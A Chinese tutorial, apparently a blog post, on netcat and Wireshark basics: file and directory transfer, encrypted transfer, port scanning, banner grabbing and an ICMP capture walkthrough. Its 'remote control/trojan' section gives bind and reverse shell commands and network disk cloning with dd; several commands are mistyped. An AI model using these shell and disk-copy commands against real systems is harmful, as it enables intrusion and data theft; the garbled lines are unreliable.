基本工具------NC,wireshark

NETCAT-NC

NC 的功能

• 侦听模式/传输模式
• telnet/获取banner信息
• 传输文本信息
• 传输文件/目录
• 加密传输文件
• 远程控制/木马
• 加密所有流量
• 流媒体服务器
• 远程克隆硬盘

传输文本信息

  • A: nc -l -p 4444 -l 侦听,-p 指定端口
    B: nc -nv 1.1.1.1 4444
    可用于远程电子取证信息收集

在这里插入图片描述

传输文件

A:nc -lp 333 > 1.mp4 侦听333端口,将侦听到的内容输出到1.mp4
B:nc -nv 1.1.1.1 333 <1.mp4 -q 1 连接333端口,传入1.mp4,-q 1传递完后1s自动退出

A:nc -lp 333 <a.mp4 -q 1
B:nc -nv 1.1.1.1 333 >2.mp4

传输目录

A:tar -cvf - music/ | nc -lp 333 -q 1将目录打包成一个文件,再传输
B: nc -nv 1.1.1.1 333 | tar -xvf –接收文件,解包

加密传输文件

A:nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb >1.mp4
B:mcrypt –flush -Fbq -a rijndael-256 -m ecb<a.mp4 | nc -nv 1.1.1.1 333 -q l

远程控制

A:nc -lp 333 -c bash
B:nc 1.1.1. 333

A:nc -lp 333
B:1.1.1.1 333 -c bash
注:windows用户把bash改成cmd

流媒体服务器

A:cat 1.mp4 | nc -lp 333
B:1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

注意:mplayer 本是没有的,需要安装

远程克隆硬盘

A:nc -lp 333 | dd of=/dev/sda
B:DD if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

端口扫描

nc -nvz 1.1.1.1 1-65535-z扫描模式(默认只扫描tcp的端口)
nc -vnzu 1.1.1.1 1-1024-u(扫描udp的端口)

nc的缺陷

缺乏加密和身份验证的能力

netcat实验telnet功能:

110是接收POP3邮件的端口,客户端可以使用POP3协议来访问服务端的邮件服务,如今ISP的绝大多数邮件服务器都是使用该协议。在使用电子邮件客户端程序的时候,会要求输入POP3服务器地址,默认情况下使用的就是110端口

在这里插入图片描述
base64加密
在这里插入图片描述
在这里插入图片描述

wireshark

抓一个icmp包

1、打开wireshark

2、选择菜单栏上Capture -> Option,勾选WLAN网卡(这里需要根据各自电脑网卡使用情况选择,简单的办法可以看使用的IP对应的网卡)。点击Start。启动抓包。

在这里插入图片描述

3、wireshark启动后,wireshark处于抓包状态中。
在这里插入图片描述

4、执行需要抓包的操作,如在cmd窗口下执行ping www.baidu.com。

在这里插入图片描述
5、操作完成后相关数据包就抓取到了。为避免其他无用的数据包影响分析,可以通过在过滤栏设置过滤条件进行数据包列表过滤,获取结果如下。说明:ip.addr == 119.75.217.26 and icmp 表示只显示ICPM协议且源主机IP或者目的主机IP为119.75.217.26的数据包。说明:协议名称icmp要小写。

Wireshakr抓包界面介绍

在这里插入图片描述

说明:数据包列表区中不同的协议使用了不同的颜色区分。协议颜色标识定位在菜单栏View --> Coloring Rules。如下所示

在这里插入图片描述

WireShark 主要分为这几个界面

  1. Display Filter(显示过滤器), 用于设置过滤条件进行数据包列表过滤。菜单路径:Analyze --> Display Filters。
    在这里插入图片描述

  2. Packet List Pane(数据包列表), 显示捕获到的数据包,每个数据包包含编号,时间戳,源地址,目标地址,协议,长度,以及数据包信息。 不同协议的数据包使用了不同的颜色区分显示。

在这里插入图片描述

  1. Packet Details Pane(数据包详细信息), 在数据包列表中选择指定数据包,在数据包详细信息中会显示数据包的所有详细信息内容。数据包详细信息面板是最重要的,用来查看协议中的每一个字段。各行信息分别为
    在这里插入图片描述

(1)Frame: 物理层的数据帧概况

(2)Ethernet II: 数据链路层以太网帧头部信息

(3)Internet Protocol Version 4: 互联网层IP包头部信息

(4)Transmission Control Protocol: 传输层T的数据段头部信息,此处是TCP

(5)Hypertext Transfer Protocol: 应用层的信息,此处是HTTP协议

TCP包的具体内容

从下图可以看到wireshark捕获到的TCP包中的每个字段。

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值